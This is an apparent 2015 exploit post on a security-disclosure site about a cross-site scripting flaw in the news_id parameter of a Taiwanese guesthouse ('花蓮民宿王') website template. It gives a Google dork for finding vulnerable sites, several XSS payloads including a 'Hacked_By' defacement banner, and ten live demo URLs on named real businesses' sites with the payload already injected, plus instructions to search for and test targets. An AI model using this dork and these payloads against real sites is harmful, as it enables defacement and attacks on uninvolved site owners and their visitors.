花蓮民宿王 │ 洄瀾網 Cross Site Scripting Vulnerability

2015.12.29
Credit: Gray Hat Group
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: "花蓮民宿王 │ 洄瀾網" inurl:index.php?news_id=

######################################################## # Exploit Title: 花蓮民宿王 │ 洄瀾網 Cross Site Scripting Vulnerability ######################################################## # Google Dork: intext:"花蓮民宿王 │ 洄瀾網" inurl:index.php?news_id= # Date: [28/12/2015] # Exploit Author: Gray Hat Group=>MR.BL4CK # Vendor Homepage: [http://www.17357.com.tw/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then test for this vulnerability You must Test scripts in After Id Number. # for example These scripts: # 1-[<script>alert('XSS')</script> # 2-["><marquee><h1>Hacked_By_MR.BL4CK_forum.gray-hg.ir</h1></marquee>] # 3-[<marquee%20behavior="alternate">Hacked_By_MR.BL4CK<b>] # Poc: # http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # GooD LucK ######################################################## # Demo: # http://www.chenfa8533996.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.gmu.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.hl-sunshine.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.shanjun.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.nice-neighbor.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.summer-love.com.tw/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.brightly-home.com.tw/new/index.php?pageNum_RecdigiBoard=0&totalRows_RecdigiBoard=1&news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.blueocean-c.com.tw/news/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.jimeihomestay.com/new/index.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E # http://www.hl-garden.com.tw/news.php?news_id=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_MR.BL4CK_forum.gray-hg.ir%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : Bl4ck W4rning | Dalghak | MR.BL4CK | WHITE | H!dden V!rus | Shayan 72 | Keian | Ahriman | MR.ROBOT # We Are Gray Hat Hackers # Discovered By:MR.BL4CK ########################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top